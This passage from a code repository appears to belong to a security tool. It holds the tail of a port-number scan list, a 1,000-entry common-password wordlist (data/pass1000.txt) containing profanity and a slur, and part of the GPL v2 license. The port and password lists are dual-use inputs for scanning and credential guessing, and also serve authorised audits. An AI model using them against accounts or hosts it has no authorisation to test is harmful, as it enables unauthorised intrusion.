71 | '106', '109', '110', '111', '113', '119', '125', '135', '139', '143', '144', '146', '161', '163', '179', '199',
72 | '211', '212', '222', '254', '255', '256', '259', '264', '280', '301', '306', '311', '340', '366', '389', '406',
73 | '407', '416', '417', '425', '427', '443', '444', '445', '458', '464', '465', '481', '497', '500', '512', '513',
74 | '514', '515', '524', '541', '543', '544', '545', '548', '554', '555', '563', '587', '593', '616', '617', '625',
75 | '631', '636', '646', '648', '666', '667', '668', '683', '687', '691', '700', '705', '711', '714', '720', '722',
76 | '726', '749', '765', '777', '783', '787', '800', '801', '808', '843', '873', '880', '888', '898', '900', '901',
77 | '902', '903', '911', '912', '981', '987', '990', '992', '993', '995', '999', '1000', '1001', '1002', '1007',
78 | '1009', '1010', '1011', '1021', '1022', '1023', '1024', '1025', '1026', '1027', '1028', '1029', '1030', '1031',
79 | '1032', '1033', '1034', '1035', '1036', '1037', '1038', '1039', '1040', '1041', '1042', '1043', '1044', '1045',
80 | '1046', '1047', '1048', '1049', '1050', '1051', '1052', '1053', '1054', '1055', '1056', '1057', '1058', '1059',
81 | '1060', '1061', '1062', '1063', '1064', '1065', '1066', '1067', '1068', '1069', '1070', '1071', '1072', '1073',
82 | '1074', '1075', '1076', '1077', '1078', '1079', '1080', '1081', '1082', '1083', '1084', '1085', '1086', '1087',
83 | '1088', '1089', '1090', '1091', '1092', '1093', '1094', '1095', '1096', '1097', '1098', '1099', '1100', '1102',
84 | '1104', '1105', '1106', '1107', '1108', '1110', '1111', '1112', '1113', '1114', '1117', '1119', '1121', '1122',
85 | '1123', '1124', '1126', '1130', '1131', '1132', '1137', '1138', '1141', '1145', '1147', '1148', '1149', '1151',
86 | '1152', '1154', '1163', '1164', '1165', '1166', '1169', '1174', '1175', '1183', '1185', '1186', '1187', '1192',
87 | '1198', '1199', '1201', '1213', '1216', '1217', '1218', '1233', '1234', '1236', '1244', '1247', '1248', '1259',
88 | '1271', '1272', '1277', '1287', '1296', '1300', '1301', '1309', '1310', '1311', '1322', '1328', '1334', '1352',
89 | '1417', '1433', '1434', '1443', '1455', '1461', '1494', '1500', '1501', '1503', '1521', '1524', '1533', '1556',
90 | '1580', '1583', '1594', '1600', '1641', '1658', '1666', '1687', '1688', '1700', '1717', '1718', '1719', '1720',
91 | '1721', '1723', '1755', '1761', '1782', '1783', '1801', '1805', '1812', '1839', '1840', '1862', '1863', '1864',
92 | '1875', '1900', '1914', '1935', '1947', '1971', '1972', '1974', '1984', '1998', '1999', '2000', '2001', '2002',
93 | '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2013', '2020', '2021', '2022', '2030', '2033',
94 | '2034', '2035', '2038', '2040', '2041', '2042', '2043', '2045', '2046', '2047', '2048', '2049', '2065', '2068',
95 | '2099', '2100', '2103', '2105', '2106', '2107', '2111', '2119', '2121', '2126', '2135', '2144', '2160', '2161',
96 | '2170', '2179', '2190', '2191', '2196', '2200', '2222', '2251', '2260', '2288', '2301', '2323', '2366', '2381',
97 | '2382', '2383', '2393', '2394', '2399', '2401', '2492', '2500', '2522', '2525', '2557', '2601', '2602', '2604',
98 | '2605', '2607', '2608', '2638', '2701', '2702', '2710', '2717', '2718', '2725', '2800', '2809', '2811', '2869',
99 | '2875', '2909', '2910', '2920', '2967', '2968', '2998', '3000', '3001', '3003', '3005', '3006', '3007', '3011',
100 | '3013', '3017', '3030', '3031', '3052', '3071', '3077', '3128', '3168', '3211', '3221', '3260', '3261', '3268',
101 | '3269', '3283', '3300', '3301', '3306', '3322', '3323', '3324', '3325', '3333', '3351', '3367', '3369', '3370',
102 | '3371', '3372', '3389', '3390', '3404', '3476', '3493', '3517', '3527', '3546', '3551', '3580', '3659', '3689',
103 | '3690', '3703', '3737', '3766', '3784', '3800', '3801', '3809', '3814', '3826', '3827', '3828', '3851', '3869',
104 | '3871', '3878', '3880', '3889', '3905', '3914', '3918', '3920', '3945', '3971', '3986', '3995', '3998', '4000',
105 | '4001', '4002', '4003', '4004', '4005', '4006', '4045', '4111', '4125', '4126', '4129', '4224', '4242', '4279',
106 | '4321', '4343', '4443', '4444', '4445', '4446', '4449', '4550', '4567', '4662', '4848', '4899', '4900', '4998',
107 | '5000', '5001', '5002', '5003', '5004', '5009', '5030', '5033', '5050', '5051', '5054', '5060', '5061', '5080',
108 | '5087', '5100', '5101', '5102', '5120', '5190', '5200', '5214', '5221', '5222', '5225', '5226', '5269', '5280',
109 | '5298', '5357', '5405', '5414', '5431', '5432', '5440', '5500', '5510', '5544', '5550', '5555', '5560', '5566',
110 | '5631', '5633', '5666', '5678', '5679', '5718', '5730', '5800', '5801', '5802', '5810', '5811', '5815', '5822',
111 | '5825', '5850', '5859', '5862', '5877', '5900', '5901', '5902', '5903', '5904', '5906', '5907', '5910', '5911',
112 | '5915', '5922', '5925', '5950', '5952', '5959', '5960', '5961', '5962', '5963', '5987', '5988', '5989', '5998',
113 | '5999', '6000', '6001', '6002', '6003', '6004', '6005', '6006', '6007', '6009', '6025', '6059', '6100', '6101',
114 | '6106', '6112', '6123', '6129', '6156', '6346', '6389', '6502', '6510', '6543', '6547', '6565', '6566', '6567',
115 | '6580', '6646', '6666', '6667', '6668', '6669', '6689', '6692', '6699', '6779', '6788', '6789', '6792', '6839',
116 | '6881', '6901', '6969', '7000', '7001', '7002', '7004', '7007', '7019', '7025', '7070', '7100', '7103', '7106',
117 | '7200', '7201', '7402', '7435', '7443', '7496', '7512', '7625', '7627', '7676', '7741', '7777', '7778', '7800',
118 | '7911', '7920', '7921', '7937', '7938', '7999', '8000', '8001', '8002', '8007', '8008', '8009', '8010', '8011',
119 | '8021', '8022', '8031', '8042', '8045', '8080', '8081', '8082', '8083', '8084', '8085', '8086', '8087', '8088',
120 | '8089', '8090', '8093', '8099', '8100', '8180', '8181', '8192', '8193', '8194', '8200', '8222', '8254', '8290',
121 | '8291', '8292', '8300', '8333', '8383', '8400', '8402', '8443', '8500', '8600', '8649', '8651', '8652', '8654',
122 | '8701', '8800', '8873', '8888', '8899', '8994', '9000', '9001', '9002', '9003', '9009', '9010', '9011', '9040',
123 | '9050', '9071', '9080', '9081', '9090', '9091', '9099', '9100', '9101', '9102', '9103', '9110', '9111', '9200',
124 | '9207', '9220', '9290', '9415', '9418', '9485', '9500', '9502', '9503', '9535', '9575', '9593', '9594', '9595',
125 | '9618', '9666', '9876', '9877', '9878', '9898', '9900', '9917', '9929', '9943', '9944', '9968', '9998', '9999',
126 | '10000', '10001', '10002', '10003', '10004', '10009', '10010', '10012', '10024', '10025', '10082', '10180',
127 | '10215', '10243', '10566', '10616', '10617', '10621', '10626', '10628', '10629', '10778', '11110', '11111',
128 | '11967', '12000', '12174', '12265', '12345', '13456', '13722', '13782', '13783', '14000', '14238', '14441',
129 | '14442', '15000', '15002', '15003', '15004', '15660', '15742', '16000', '16001', '16012', '16016', '16018',
130 | '16080', '16113', '16992', '16993', '17877', '17988', '18040', '18101', '18988', '19101', '19283', '19315',
131 | '19350', '19780', '19801', '19842', '20000', '20005', '20031', '20221', '20222', '20828', '21571', '22939',
132 | '23502', '24444', '24800', '25734', '25735', '26214', '27000', '27352', '27353', '27355', '27356', '27715',
133 | '28201', '30000', '30718', '30951', '31038', '31337', '32768', '32769', '32770', '32771', '32772', '32773',
134 | '32774', '32775', '32776', '32777', '32778', '32779', '32780', '32781', '32782', '32783', '32784', '32785',
135 | '33354', '33899', '34571', '34572', '34573', '35500', '38292', '40193', '40911', '41511', '42510', '44176',
136 | '44442', '44443', '44501', '45100', '48080', '49152', '49153', '49154', '49155', '49156', '49157', '49158',
137 | '49159', '49160', '49161', '49163', '49165', '49167', '49175', '49176', '49400', '49999', '50000', '50001',
138 | '50002', '50003', '50006', '50300', '50389', '50500', '50636', '50800', '51103', '51493', '52673', '52822',
139 | '52848', '52869', '54045', '54328', '55055', '55056', '55555', '55600', '56737', '56738', '57294', '57797',
140 | '58080', '60020', '60443', '61532', '61900', '62078', '63331', '64623', '64680', '65000', '65129', '65389']
141 |
--------------------------------------------------------------------------------
/data/pass1000.txt:
--------------------------------------------------------------------------------
1 | password
2 | 123456
3 | 12345678
4 | 1234
5 | qwerty
6 | 12345
7 | dragon
8 | pussy
9 | baseball
10 | football
11 | letmein
12 | monkey
13 | 696969
14 | abc123
15 | mustang
16 | michael
17 | shadow
18 | master
19 | jennifer
20 | 111111
21 | 2000
22 | jordan
23 | superman
24 | harley
25 | 1234567
26 | fuckme
27 | hunter
28 | fuckyou
29 | trustno1
30 | ranger
31 | buster
32 | thomas
33 | tigger
34 | robert
35 | soccer
36 | fuck
37 | batman
38 | test
39 | pass
40 | killer
41 | hockey
42 | george
43 | charlie
44 | andrew
45 | michelle
46 | love
47 | sunshine
48 | jessica
49 | asshole
50 | 6969
51 | pepper
52 | daniel
53 | access
54 | 123456789
55 | 654321
56 | joshua
57 | maggie
58 | starwars
59 | silver
60 | william
61 | dallas
62 | yankees
63 | 123123
64 | ashley
65 | 666666
66 | hello
67 | amanda
68 | orange
69 | biteme
70 | freedom
71 | computer
72 | sexy
73 | thunder
74 | nicole
75 | ginger
76 | heather
77 | hammer
78 | summer
79 | corvette
80 | taylor
81 | fucker
82 | austin
83 | 1111
84 | merlin
85 | matthew
86 | 121212
87 | golfer
88 | cheese
89 | princess
90 | martin
91 | chelsea
92 | patrick
93 | richard
94 | diamond
95 | yellow
96 | bigdog
97 | secret
98 | asdfgh
99 | sparky
100 | cowboy
101 | camaro
102 | anthony
103 | matrix
104 | falcon
105 | iloveyou
106 | bailey
107 | guitar
108 | jackson
109 | purple
110 | scooter
111 | phoenix
112 | aaaaaa
113 | morgan
114 | tigers
115 | porsche
116 | mickey
117 | maverick
118 | cookie
119 | nascar
120 | peanut
121 | justin
122 | 131313
123 | money
124 | horny
125 | samantha
126 | panties
127 | steelers
128 | joseph
129 | snoopy
130 | boomer
131 | whatever
132 | iceman
133 | smokey
134 | gateway
135 | dakota
136 | cowboys
137 | eagles
138 | chicken
139 | dick
140 | black
141 | zxcvbn
142 | please
143 | andrea
144 | ferrari
145 | knight
146 | hardcore
147 | melissa
148 | compaq
149 | coffee
150 | booboo
151 | bitch
152 | johnny
153 | bulldog
154 | xxxxxx
155 | welcome
156 | james
157 | player
158 | ncc1701
159 | wizard
160 | scooby
161 | charles
162 | junior
163 | internet
164 | bigdick
165 | mike
166 | brandy
167 | tennis
168 | blowjob
169 | banana
170 | monster
171 | spider
172 | lakers
173 | miller
174 | rabbit
175 | enter
176 | mercedes
177 | brandon
178 | steven
179 | fender
180 | john
181 | yamaha
182 | diablo
183 | chris
184 | boston
185 | tiger
186 | marine
187 | chicago
188 | rangers
189 | gandalf
190 | winter
191 | bigtits
192 | barney
193 | edward
194 | raiders
195 | porn
196 | badboy
197 | blowme
198 | spanky
199 | bigdaddy
200 | johnson
201 | chester
202 | london
203 | midnight
204 | blue
205 | fishing
206 | 000000
207 | hannah
208 | slayer
209 | 11111111
210 | rachel
211 | sexsex
212 | redsox
213 | thx1138
214 | asdf
215 | marlboro
216 | panther
217 | zxcvbnm
218 | arsenal
219 | oliver
220 | qazwsx
221 | mother
222 | victoria
223 | 7777777
224 | jasper
225 | angel
226 | david
227 | winner
228 | crystal
229 | golden
230 | butthead
231 | viking
232 | jack
233 | iwantu
234 | shannon
235 | murphy
236 | angels
237 | prince
238 | cameron
239 | girls
240 | madison
241 | wilson
242 | carlos
243 | hooters
244 | willie
245 | startrek
246 | captain
247 | maddog
248 | jasmine
249 | butter
250 | booger
251 | angela
252 | golf
253 | lauren
254 | rocket
255 | tiffany
256 | theman
257 | dennis
258 | liverpoo
259 | flower
260 | forever
261 | green
262 | jackie
263 | muffin
264 | turtle
265 | sophie
266 | danielle
267 | redskins
268 | toyota
269 | jason
270 | sierra
271 | winston
272 | debbie
273 | giants
274 | packers
275 | newyork
276 | jeremy
277 | casper
278 | bubba
279 | 112233
280 | sandra
281 | lovers
282 | mountain
283 | united
284 | cooper
285 | driver
286 | tucker
287 | helpme
288 | fucking
289 | pookie
290 | lucky
291 | maxwell
292 | 8675309
293 | bear
294 | suckit
295 | gators
296 | 5150
297 | 222222
298 | shithead
299 | fuckoff
300 | jaguar
301 | monica
302 | fred
303 | happy
304 | hotdog
305 | tits
306 | gemini
307 | lover
308 | xxxxxxxx
309 | 777777
310 | canada
311 | nathan
312 | victor
313 | florida
314 | 88888888
315 | nicholas
316 | rosebud
317 | metallic
318 | doctor
319 | trouble
320 | success
321 | stupid
322 | tomcat
323 | warrior
324 | peaches
325 | apples
326 | fish
327 | qwertyui
328 | magic
329 | buddy
330 | dolphins
331 | rainbow
332 | gunner
333 | 987654
334 | freddy
335 | alexis
336 | braves
337 | cock
338 | 2112
339 | 1212
340 | cocacola
341 | xavier
342 | dolphin
343 | testing
344 | bond007
345 | member
346 | calvin
347 | voodoo
348 | 7777
349 | samson
350 | alex
351 | apollo
352 | fire
353 | tester
354 | walter
355 | beavis
356 | voyager
357 | peter
358 | porno
359 | bonnie
360 | rush2112
361 | beer
362 | apple
363 | scorpio
364 | jonathan
365 | skippy
366 | sydney
367 | scott
368 | red123
369 | power
370 | gordon
371 | travis
372 | beaver
373 | star
374 | jackass
375 | flyers
376 | boobs
377 | 232323
378 | zzzzzz
379 | steve
380 | rebecca
381 | scorpion
382 | doggie
383 | legend
384 | ou812
385 | yankee
386 | blazer
387 | bill
388 | runner
389 | birdie
390 | bitches
391 | 555555
392 | parker
393 | topgun
394 | asdfasdf
395 | heaven
396 | viper
397 | animal
398 | 2222
399 | bigboy
400 | 4444
401 | arthur
402 | baby
403 | private
404 | godzilla
405 | donald
406 | williams
407 | lifehack
408 | phantom
409 | dave
410 | rock
411 | august
412 | sammy
413 | cool
414 | brian
415 | platinum
416 | jake
417 | bronco
418 | paul
419 | mark
420 | frank
421 | heka6w2
422 | copper
423 | billy
424 | cumshot
425 | garfield
426 | willow
427 | cunt
428 | little
429 | carter
430 | slut
431 | albert
432 | 69696969
433 | kitten
434 | super
435 | jordan23
436 | eagle1
437 | shelby
438 | america
439 | 11111
440 | jessie
441 | house
442 | free
443 | 123321
444 | chevy
445 | bullshit
446 | white
447 | broncos
448 | horney
449 | surfer
450 | nissan
451 | 999999
452 | saturn
453 | airborne
454 | elephant
455 | marvin
456 | shit
457 | action
458 | adidas
459 | qwert
460 | kevin
461 | 1313
462 | explorer
463 | walker
464 | police
465 | christin
466 | december
467 | benjamin
468 | wolf
469 | sweet
470 | therock
471 | king
472 | online
473 | dickhead
474 | brooklyn
475 | teresa
476 | cricket
477 | sharon
478 | dexter
479 | racing
480 | penis
481 | gregory
482 | 0000
483 | teens
484 | redwings
485 | dreams
486 | michigan
487 | hentai
488 | magnum
489 | 87654321
490 | nothing
491 | donkey
492 | trinity
493 | digital
494 | 333333
495 | stella
496 | cartman
497 | guinness
498 | 123abc
499 | speedy
500 | buffalo
501 | kitty
502 | pimpin
503 | eagle
504 | einstein
505 | kelly
506 | nelson
507 | nirvana
508 | vampire
509 | xxxx
510 | playboy
511 | louise
512 | pumpkin
513 | snowball
514 | test123
515 | girl
516 | sucker
517 | mexico
518 | beatles
519 | fantasy
520 | ford
521 | gibson
522 | celtic
523 | marcus
524 | cherry
525 | cassie
526 | 888888
527 | natasha
528 | sniper
529 | chance
530 | genesis
531 | hotrod
532 | reddog
533 | alexande
534 | college
535 | jester
536 | passw0rd
537 | bigcock
538 | smith
539 | lasvegas
540 | carmen
541 | slipknot
542 | 3333
543 | death
544 | kimberly
545 | 1q2w3e
546 | eclipse
547 | 1q2w3e4r
548 | stanley
549 | samuel
550 | drummer
551 | homer
552 | montana
553 | music
554 | aaaa
555 | spencer
556 | jimmy
557 | carolina
558 | colorado
559 | creative
560 | hello1
561 | rocky
562 | goober
563 | friday
564 | bollocks
565 | scotty
566 | abcdef
567 | bubbles
568 | hawaii
569 | fluffy
570 | mine
571 | stephen
572 | horses
573 | thumper
574 | 5555
575 | pussies
576 | darkness
577 | asdfghjk
578 | pamela
579 | boobies
580 | buddha
581 | vanessa
582 | sandman
583 | naughty
584 | douglas
585 | honda
586 | matt
587 | azerty
588 | 6666
589 | shorty
590 | money1
591 | beach
592 | loveme
593 | 4321
594 | simple
595 | poohbear
596 | 444444
597 | badass
598 | destiny
599 | sarah
600 | denise
601 | vikings
602 | lizard
603 | melanie
604 | assman
605 | sabrina
606 | nintendo
607 | water
608 | good
609 | howard
610 | time
611 | 123qwe
612 | november
613 | xxxxx
614 | october
615 | leather
616 | bastard
617 | young
618 | 101010
619 | extreme
620 | hard
621 | password1
622 | vincent
623 | pussy1
624 | lacrosse
625 | hotmail
626 | spooky
627 | amateur
628 | alaska
629 | badger
630 | paradise
631 | maryjane
632 | poop
633 | crazy
634 | mozart
635 | video
636 | russell
637 | vagina
638 | spitfire
639 | anderson
640 | norman
641 | eric
642 | cherokee
643 | cougar
644 | barbara
645 | long
646 | 420420
647 | family
648 | horse
649 | enigma
650 | allison
651 | raider
652 | brazil
653 | blonde
654 | jones
655 | 55555
656 | dude
657 | drowssap
658 | jeff
659 | school
660 | marshall
661 | lovely
662 | 1qaz2wsx
663 | jeffrey
664 | caroline
665 | franklin
666 | booty
667 | molly
668 | snickers
669 | leslie
670 | nipples
671 | courtney
672 | diesel
673 | rocks
674 | eminem
675 | westside
676 | suzuki
677 | daddy
678 | passion
679 | hummer
680 | ladies
681 | zachary
682 | frankie
683 | elvis
684 | reggie
685 | alpha
686 | suckme
687 | simpson
688 | patricia
689 | 147147
690 | pirate
691 | tommy
692 | semperfi
693 | jupiter
694 | redrum
695 | freeuser
696 | wanker
697 | stinky
698 | ducati
699 | paris
700 | natalie
701 | babygirl
702 | bishop
703 | windows
704 | spirit
705 | pantera
706 | monday
707 | patches
708 | brutus
709 | houston
710 | smooth
711 | penguin
712 | marley
713 | forest
714 | cream
715 | 212121
716 | flash
717 | maximus
718 | nipple
719 | bobby
720 | bradley
721 | vision
722 | pokemon
723 | champion
724 | fireman
725 | indian
726 | softball
727 | picard
728 | system
729 | clinton
730 | cobra
731 | enjoy
732 | lucky1
733 | claire
734 | claudia
735 | boogie
736 | timothy
737 | marines
738 | security
739 | dirty
740 | admin
741 | wildcats
742 | pimp
743 | dancer
744 | hardon
745 | veronica
746 | fucked
747 | abcd1234
748 | abcdefg
749 | ironman
750 | wolverin
751 | remember
752 | great
753 | freepass
754 | bigred
755 | squirt
756 | justice
757 | francis
758 | hobbes
759 | kermit
760 | pearljam
761 | mercury
762 | domino
763 | 9999
764 | denver
765 | brooke
766 | rascal
767 | hitman
768 | mistress
769 | simon
770 | tony
771 | bbbbbb
772 | friend
773 | peekaboo
774 | naked
775 | budlight
776 | electric
777 | sluts
778 | stargate
779 | saints
780 | bondage
781 | brittany
782 | bigman
783 | zombie
784 | swimming
785 | duke
786 | qwerty1
787 | babes
788 | scotland
789 | disney
790 | rooster
791 | brenda
792 | mookie
793 | swordfis
794 | candy
795 | duncan
796 | olivia
797 | hunting
798 | blink182
799 | alicia
800 | 8888
801 | samsung
802 | bubba1
803 | whore
804 | virginia
805 | general
806 | passport
807 | aaaaaaaa
808 | erotic
809 | liberty
810 | arizona
811 | jesus
812 | abcd
813 | newport
814 | skipper
815 | rolltide
816 | balls
817 | happy1
818 | galore
819 | christ
820 | weasel
821 | 242424
822 | wombat
823 | digger
824 | classic
825 | bulldogs
826 | poopoo
827 | accord
828 | popcorn
829 | turkey
830 | jenny
831 | amber
832 | bunny
833 | mouse
834 | 007007
835 | titanic
836 | liverpool
837 | dreamer
838 | everton
839 | friends
840 | chevelle
841 | carrie
842 | gabriel
843 | psycho
844 | nemesis
845 | burton
846 | pontiac
847 | connor
848 | eatme
849 | lickme
850 | roland
851 | cumming
852 | mitchell
853 | ireland
854 | lincoln
855 | arnold
856 | spiderma
857 | patriots
858 | goblue
859 | devils
860 | eugene
861 | empire
862 | asdfg
863 | cardinal
864 | brown
865 | shaggy
866 | froggy
867 | qwer
868 | kawasaki
869 | kodiak
870 | people
871 | phpbb
872 | light
873 | 54321
874 | kramer
875 | chopper
876 | hooker
877 | honey
878 | whynot
879 | lesbian
880 | lisa
881 | baxter
882 | adam
883 | snake
884 | teen
885 | ncc1701d
886 | qqqqqq
887 | airplane
888 | britney
889 | avalon
890 | sandy
891 | sugar
892 | sublime
893 | stewart
894 | wildcat
895 | raven
896 | scarface
897 | elizabet
898 | 123654
899 | trucks
900 | wolfpack
901 | pervert
902 | lawrence
903 | raymond
904 | redhead
905 | american
906 | alyssa
907 | bambam
908 | movie
909 | woody
910 | shaved
911 | snowman
912 | tiger1
913 | chicks
914 | raptor
915 | 1969
916 | stingray
917 | shooter
918 | france
919 | stars
920 | madmax
921 | kristen
922 | sports
923 | jerry
924 | 789456
925 | garcia
926 | simpsons
927 | lights
928 | ryan
929 | looking
930 | chronic
931 | alison
932 | hahaha
933 | packard
934 | hendrix
935 | perfect
936 | service
937 | spring
938 | srinivas
939 | spike
940 | katie
941 | 252525
942 | oscar
943 | brother
944 | bigmac
945 | suck
946 | single
947 | cannon
948 | georgia
949 | popeye
950 | tattoo
951 | texas
952 | party
953 | bullet
954 | taurus
955 | sailor
956 | wolves
957 | panthers
958 | japan
959 | strike
960 | flowers
961 | pussycat
962 | chris1
963 | loverboy
964 | berlin
965 | sticky
966 | marina
967 | tarheels
968 | fisher
969 | russia
970 | connie
971 | wolfgang
972 | testtest
973 | mature
974 | bass
975 | catch22
976 | juice
977 | michael1
978 | nigger
979 | 159753
980 | women
981 | alpha1
982 | trooper
983 | hawkeye
984 | head
985 | freaky
986 | dodgers
987 | pakistan
988 | machine
989 | pyramid
990 | vegeta
991 | katana
992 | moose
993 | tinker
994 | coyote
995 | infinity
996 | inside
997 | pepsi
998 | letmein1
999 | bang
1000 | control
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 2, June 1991
3 |
4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
6 | Everyone is permitted to copy and distribute verbatim copies
7 | of this license document, but changing it is not allowed.
8 |
9 | Preamble
10 |
11 | The licenses for most software are designed to take away your
12 | freedom to share and change it. By contrast, the GNU General Public
13 | License is intended to guarantee your freedom to share and change free
14 | software--to make sure the software is free for all its users. This
15 | General Public License applies to most of the Free Software
16 | Foundation's software and to any other program whose authors commit to
17 | using it. (Some other Free Software Foundation software is covered by
18 | the GNU Lesser General Public License instead.) You can apply it to
19 | your programs, too.
20 |
21 | When we speak of free software, we are referring to freedom, not
22 | price. Our General Public Licenses are designed to make sure that you
23 | have the freedom to distribute copies of free software (and charge for
24 | this service if you wish), that you receive source code or can get it
25 | if you want it, that you can change the software or use pieces of it
26 | in new free programs; and that you know you can do these things.
27 |
28 | To protect your rights, we need to make restrictions that forbid
29 | anyone to deny you these rights or to ask you to surrender the rights.
30 | These restrictions translate to certain responsibilities for you if you
31 | distribute copies of the software, or if you modify it.
32 |
33 | For example, if you distribute copies of such a program, whether
34 | gratis or for a fee, you must give the recipients all the rights that
35 | you have. You must make sure that they, too, receive or can get the
36 | source code. And you must show them these terms so they know their
37 | rights.
38 |
39 | We protect your rights with two steps: (1) copyright the software, and
40 | (2) offer you this license which gives you legal permission to copy,
41 | distribute and/or modify the software.
42 |
43 | Also, for each author's protection and ours, we want to make certain
44 | that everyone understands that there is no warranty for this free
45 | software. If the software is modified by someone else and passed on, we
46 | want its recipients to know that what they have is not the original, so
47 | that any problems introduced by others will not reflect on the original
48 | authors' reputations.
49 |
50 | Finally, any free program is threatened constantly by software
51 | patents. We wish to avoid the danger that redistributors of a free
52 | program will individually obtain patent licenses, in effect making the
53 | program proprietary. To prevent this, we have made it clear that any
54 | patent must be licensed for everyone's free use or not licensed at all.
55 |
56 | The precise terms and conditions for copying, distribution and
57 | modification follow.
58 |
59 | GNU GENERAL PUBLIC LICENSE
60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
61 |
62 | 0. This License applies to any program or other work which contains
63 | a notice placed by the copyright holder saying it may be distributed
64 | under the terms of this General Public License. The "Program", below,
65 | refers to any such program or work, and a "work based on the Program"
66 | means either the Program or any derivative work under copyright law:
67 | that is to say, a work containing the Program or a portion of it,
68 | either verbatim or with modifications and/or translated into another
69 | language. (Hereinafter, translation is included without limitation in
70 | the term "modification".) Each licensee is addressed as "you".
71 |
72 | Activities other than copying, distribution and modification are not
73 | covered by this License; they are outside its scope. The act of
74 | running the Program is not restricted, and the output from the Program
75 | is covered only if its contents constitute a work based on the
76 | Program (independent of having been made by running the Program).
77 | Whether that is true depends on what the Program does.
78 |
79 | 1. You may copy and distribute verbatim copies of the Program's
80 | source code as you receive it, in any medium, provided that you
81 | conspicuously and appropriately publish on each copy an appropriate
82 | copyright notice and disclaimer of warranty; keep intact all the
83 | notices that refer to this License and to the absence of any warranty;
84 | and give any other recipients of the Program a copy of this License
85 | along with the Program.
86 |
87 | You may charge a fee for the physical act of transferring a copy, and
88 | you may at your option offer warranty protection in exchange for a fee.
89 |
90 | 2. You may modify your copy or copies of the Program or any portion
91 | of it, thus forming a work based on the Program, and copy and
92 | distribute such modifications or work under the terms of Section 1
93 | above, provided that you also meet all of these conditions:
94 |
95 | a) You must cause the modified files to carry prominent notices
96 | stating that you changed the files and the date of any change.
97 |
98 | b) You must cause any work that you distribute or publish, that in
99 | whole or in part contains or is derived from the Program or any
100 | part thereof, to be licensed as a whole at no charge to all third
101 | parties under the terms of this License.
102 |
103 | c) If the modified program normally reads commands interactively
104 | when run, you must cause it, when started running for such
105 | interactive use in the most ordinary way, to print or display an
106 | announcement including an appropriate copyright notice and a
107 | notice that there is no warranty (or else, saying that you provide
108 | a warranty) and that users may redistribute the program under
109 | these conditions, and telling the user how to view a copy of this
110 | License. (Exception: if the Program itself is interactive but
111 | does not normally print such an announcement, your work based on
112 | the Program is not required to print an announcement.)
113 |
114 | These requirements apply to the modified work as a whole. If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works. But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 |
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 |
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 |
134 | 3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 |
138 | a) Accompany it with the complete corresponding machine-readable
139 | source code, which must be distributed under the terms of Sections
140 | 1 and 2 above on a medium customarily used for software interchange; or,
141 |
142 | b) Accompany it with a written offer, valid for at least three
143 | years, to give any third party, for a charge no more than your
144 | cost of physically performing source distribution, a complete
145 | machine-readable copy of the corresponding source code, to be
146 | distributed under the terms of Sections 1 and 2 above on a medium
147 | customarily used for software interchange; or,
148 |
149 | c) Accompany it with the information you received as to the offer
150 | to distribute corresponding source code. (This alternative is
151 | allowed only for noncommercial distribution and only if you
152 | received the program in object code or executable form with such
153 | an offer, in accord with Subsection b above.)
154 |
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it. For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable. However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 |
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 |
172 | 4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License. Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 |
180 | 5. You are not required to accept this License, since you have not
181 | signed it. However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works. These actions are
183 | prohibited by law if you do not accept this License. Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 |
189 | 6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions. You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 |
197 | 7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License. If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all. For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 |
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 |
215 | It is not the purpose of this section to induce you to infringe any
